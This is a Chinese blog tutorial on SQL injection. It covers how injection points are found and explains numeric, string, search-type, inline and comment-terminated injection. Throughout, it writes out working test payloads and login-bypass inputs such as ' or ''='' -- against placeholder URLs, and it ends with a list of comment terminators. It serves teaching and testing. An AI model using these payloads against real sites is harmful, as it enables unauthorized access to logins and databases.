https://blog.csdn.net/lendq/article/details/80226452
SQL注入漏洞产生的原因
SQL语句
查询:SELECT statement FROM table WHERE condition
删除记录:DELETE FROM table WHERE condition
更新记录:UPDATE table SET field=value WHERE condtion
添加记录:INSERT INTO table field VALUES(values)
SQL
注入攻击流程判断注入点
判断注入点类型
判断数据库类型
获取数据库数据库,提权
SQL
注入点找注入点是最关键,也最基础的一个环节
SQL
注入
Get
参数触发SQL
注入 POST
参数触发SQL
注入 Cookie
触发SQL
注入
链接?参数
) 找形如
?id=num
的,搜索框 的 ,
而验证是否存在注入点的方法有很多种
最常规,也最简单的方法,引入单引号判断是否存在注入点
http://host/test.php?id=100’
返回错误说明有可能注入
http://host/test.php?id=100 and 1=1
返回正常
http://host/test.php?id=100 and 1=2
返回错误
如果满足上面三点,是注入点
的可能性就很高了
找到注入点之后就是
0x01 数字型注入点
测试方法:
http://host/test.php?id=100 and 1=1
返回成功
http://host/test.php?id=100 and 1=2
返回失败
为什么第一个会返回成功,而第二个是返回失败呢?
假设我们网站的SQL查询的语句是这样的 SELECT * FROM news WHERE id=$id
这里的$id
是用户提交的
当我们输入的是
100 and 1=1
语句就变成了这样SELECT * FROM news WHERE id=100 and 1=1
这个
SQL
语句and
左边是返回成功的,因为我们是在有这个id
的情况下后面加上我们的注入语句,如果这个id
不存在,那就没法测试了而在
and
右边,1=1也是恒成立的,所以整个语句返回的是成功当然,如果后面改成了
1=2
的话,因为1=2
是不成立的,and
语句的判断逻辑是只要有一个不成立,就返回失败,所以1=2
最后会返回的是失败
0x02 字符型注入点
测试方法:
http://host/test.php?name=man' and '1'='1
返回成功
http://host/test.php?name=man' and '1'='2
返回失败
这里就使上面的数字型变为了字符型
还是假设我们网站的SQL语句是这样的 SELECT * FROM news WHERE name='$name'
当我们构造输入为下面这个的时候 man' and '1'='1
语句就变成了 SELECT * FROM news WHERE name='man' and '1'='1'
发现什么了没?这个SQL已经闭合了
还是一样的,这里
and
的左边是一定成立的,而and
右边也是一样的成立,所以and逻辑之后,整个语句返回成功
同理可知如果后面是1'='2
就会返回失败,当然,这里不一定非要是1
或者2
,因为是字符型,所以我们可以输入任何字符
比如这样
http://host/test.php?name=man' and 'a'='a
返回成功http://host/test.php?name=man' and 'a'='b
返回失败
0x03 搜索型注入点 — 目前常见的
测试方法
http://host//test.php?keyword=python%' and 1=1 and '%'='
http://host//test.php?keyword=python%' and 1=2 and '%'='
假设我们的SQL查询语句是这样的
SELECT * FROM news WHERE keyword like '%$keyword%'
这里的
$keyword
是用户的输入当我们输入以下语句的时候
pt%' and 1=1 and '%'='
最终我们得到的语句是这样的SELECT * FROM news WHERE keyword like '%pt%' and 1=1 and '%'='%'
这个语句又一次的闭合了
这里我们再分析以下,因为是and
逻辑,只要有一个错误,就返回错误
我们可以把这个语句分为三段
SELECT * FROM news WHERE keyword like '%python%'
and 1=1
and '%'='%'
第一行的语句肯定是成功(再强调一遍,我们要在存在的查询上构造SQL注入)
第二句也是,第三句也是,因为自己肯定等于自己啊
但是如果我们把第二句换成
1=2
,那么这个语句肯定就会返回失败了,就是这个原理
0x04 内联式SQL注入 –常用
内联注入是指查询注入SQL
代码后,原来的查询仍然全部执行
假设我们的网站SQL
查询语句是这样的
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
这一看就是个登录页面的代码
假如我们构造如下语句提交到登录框中的
username
' or ''='
或者提交到
password
框里面,这两种提交方法是不一样的,我们下面就来分析一下这两个提交方法提交到
username
我们的语句就会成为这样
SELECT * FROM admin WHER username='' or ''='' AND password ='fuzz'
fuzz
是我们随便输入的字符串
而提交到
password
则会是这样的
SELECT * FROM admin WHER username='fuzz' AND password ='' or ''=''
SQL
语句中,
AND
的优先级是大于
OR
的
AND
,然后计算
OR
,所以这里我们的语句会被
OR
分为两段
SQL
语句
这是username
框的
SELECT * FROM admin WHER username=''
or
''='' AND password ='fuzz'
或者password
框的是这样
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
我们首先用第一个来分析
首先计算AND
之后
SELECT * FROM admin WHER username=''
返回失败
or
''='' AND password ='fuzz'
返回失败
数据库是不会存在username
为NULL
的字段的,所以第一句返回的是失败,第三句中,因为password
是我们随便输入的,99.99%
是不会存在这个密码的,于是AND
之后,我们的第三句也是失败的,所以整个语句返回失败的
但是我们的password
情况就不一样了
SELECT * FROM admin WHER username='fuzz' AND password =''
or
''=''
这里我们第一句是返回失败的,但是我们的第二句''=''
是返回成功的,OR
逻辑是有一个是成功就返回成功,于是我们的整个语句就会返回成功
返回成功之后我们就会绕过登录表单直接登录系统了
0x05 终止式SQL注入 —常用
终止式SQL
语句注入是指攻击者在注入SQL
代码时,通过注释剩下的查询来成功结束该语句
于是被注释的查询不会被执行,我们还是拿上面那个例子举例
我们上面已经知道,在
username
框内填入
' or ''='
程序是不会返回成功的,我们就没有办法在
username
做文章了吗?
错了,我们还有终止式
还是上面那个SQL
查询语句
SELECT * FROM admin WHER username='$name' AND password ='$passwd'
这里我们构造如下username
输入
' or ''='' --
之后我们就可以得到如下的查询语句
SELECT * FROM admin WHER username='' or ''='' --' AND password ='fuzz'
这里的fuzz
是我们随便输入的,--
是注释符
这样,我们的语句就可以分为三个部分了
SELECT * FROM admin WHER username=''
or ''='' 返回成功
--' AND password ='fuzz'
第一句肯定是返回失败的,但是我们第二句会返回成功
后面已经被我们注释掉了,是不会执行的,所以我们还是可以通过在username
做这个手脚来绕过登录
下面是我们常见的一些终止方式
-- , #, %23, %00, /*
-- , ‘-- , ‘)-- , ) -- , ‘)) --, ))--